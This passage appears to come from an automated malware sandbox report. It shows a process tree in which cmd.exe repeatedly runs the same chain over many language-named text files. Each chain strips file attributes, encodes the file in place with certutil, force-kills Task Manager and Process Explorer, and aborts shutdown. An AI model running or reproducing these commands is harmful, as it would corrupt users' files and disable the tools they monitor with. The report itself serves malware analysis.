        PID:1696
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ar.txt" "ar.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1352
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:900
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ar.txt" "ar.txt".14849
        5⤵
        
        PID:1776
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:2036
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:328
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ast.txt" "ast.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:592
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1832
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ast.txt" "ast.txt".14849
        5⤵
        
        PID:1700
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1716
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1748
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "az.txt" "az.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1820
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:816
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "az.txt" "az.txt".14849
        5⤵
        
        PID:964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1660
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1764
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ba.txt" "ba.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1560
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:436
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ba.txt" "ba.txt".14849
        5⤵
        
        PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:316
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1812
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "be.txt" "be.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1960
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1992
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "be.txt" "be.txt".14849
        5⤵
        
        PID:660
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1640
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1680
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "bg.txt" "bg.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1512
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:1464
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "bg.txt" "bg.txt".14849
        5⤵
        
        PID:1468
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1456
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1520
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "bn.txt" "bn.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:556
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1476
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "bn.txt" "bn.txt".14849
        5⤵
        
        PID:1792
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1088
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1696
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "br.txt" "br.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1164
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1628
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "br.txt" "br.txt".14849
        5⤵
        
        PID:1776
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:656
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:328
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ca.txt" "ca.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:828
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:636
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ca.txt" "ca.txt".14849
        5⤵
        
        PID:1700
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1688
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1748
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "co.txt" "co.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:332
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:520
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "co.txt" "co.txt".14849
        5⤵
        
        PID:964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1880
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1944
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "cs.txt" "cs.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1820
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:436
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "cs.txt" "cs.txt".14849
        5⤵
        
        PID:1460
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:760
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:940
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "cy.txt" "cy.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1560
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1992
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "cy.txt" "cy.txt".14849
        5⤵
        
        PID:1888
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:788
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1440
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "da.txt" "da.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1960
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1464
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "da.txt" "da.txt".14849
        5⤵
        
        PID:1616
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1452
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1712
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "de.txt" "de.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:764
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1548
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "de.txt" "de.txt".14849
        5⤵
        
        PID:852
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:304
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1252
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "el.txt" "el.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:944
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1920
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "el.txt" "el.txt".14849
        5⤵
        
        PID:1092
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:2036
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1352
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "en.ttt" "en.ttt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:900
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:648
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "en.ttt" "en.ttt".14849
        5⤵
        
        PID:1728
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:572
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1488
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "eo.txt" "eo.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:744
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:1748
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "eo.txt" "eo.txt".14849
        5⤵
        
        PID:828
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1364
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1816
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "es.txt" "es.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1988
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1944
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "es.txt" "es.txt".14849
        5⤵
        
        PID:332
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1664
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1204
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "et.txt" "et.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1624
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:1540
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "et.txt" "et.txt".14849
        5⤵
        
        PID:868
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:660
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1596
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "eu.txt" "eu.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1680
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1848
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "eu.txt" "eu.txt".14849
        5⤵
        
        PID:1736
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1684
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1068
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ext.txt" "ext.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1520
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:680
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ext.txt" "ext.txt".14849
        5⤵
        
        PID:1244
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1792
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1672
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fa.txt" "fa.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1696
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1252
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "fa.txt" "fa.txt".14849
        5⤵
        
        PID:764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1776
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1316
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fi.txt" "fi.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1420
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:1352
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "fi.txt" "fi.txt".14849
        5⤵
        
        PID:944
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:424
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1716
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fr.txt" "fr.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1688
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1488
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "fr.txt" "fr.txt".14849
        5⤵
        
        PID:900
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:520
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:324
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fur.txt" "fur.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1880
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:1816
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "fur.txt" "fur.txt".14849
        5⤵
        
        PID:744
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:436
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1892
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "fy.txt" "fy.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1812
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1204
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "fy.txt" "fy.txt".14849
        5⤵
        
        PID:1988
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1692
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:912
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ga.txt" "ga.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:788
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1596
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ga.txt" "ga.txt".14849
        5⤵
        
        PID:1624
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1468
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1760
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "gl.txt" "gl.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1428
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1068
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "gl.txt" "gl.txt".14849
        5⤵
        
        PID:1680
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1548
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1296
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "gu.txt" "gu.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:304
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1672
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "gu.txt" "gu.txt".14849
        5⤵
        
        PID:1520
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1920
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:656
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "he.txt" "he.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:2036
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:1316
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "he.txt" "he.txt".14849
        5⤵
        
        PID:1696
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:648
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1900
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hi.txt" "hi.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1016
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:1716
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "hi.txt" "hi.txt".14849
        5⤵
        
        PID:1420
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1748
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1756
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hr.txt" "hr.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1364
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:324
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "hr.txt" "hr.txt".14849
        5⤵
        
        PID:1688
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1944
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1732
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hu.txt" "hu.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1964
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:1892
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "hu.txt" "hu.txt".14849
        5⤵
        
        PID:1880
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1540
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1992
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "hy.txt" "hy.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1888
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:760
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "hy.txt" "hy.txt".14849
        5⤵
        
        PID:940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Kills process with taskkill
        
        PID:1560
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1464
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "id.txt" "id.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1684
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1336
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "id.txt" "id.txt".14849
        5⤵
        
        PID:1440
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1960
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1476
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "io.txt" "io.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1908
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1452
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "io.txt" "io.txt".14849
        5⤵
        
        PID:1712
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1512
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1628
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "is.txt" "is.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1776
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Views/modifies file attributes
        
        PID:1564
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "is.txt" "is.txt".14849
        5⤵
        
        PID:1940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:556
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:636
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "it.txt" "it.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1192
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops file in Program Files directory
        
        PID:1932
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "it.txt" "it.txt".14849
        5⤵
        
        PID:328
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1164
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1832
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ja.txt" "ja.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:520
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:572
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "ja.txt" "ja.txt".14849
        5⤵
        
        PID:1652
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:592
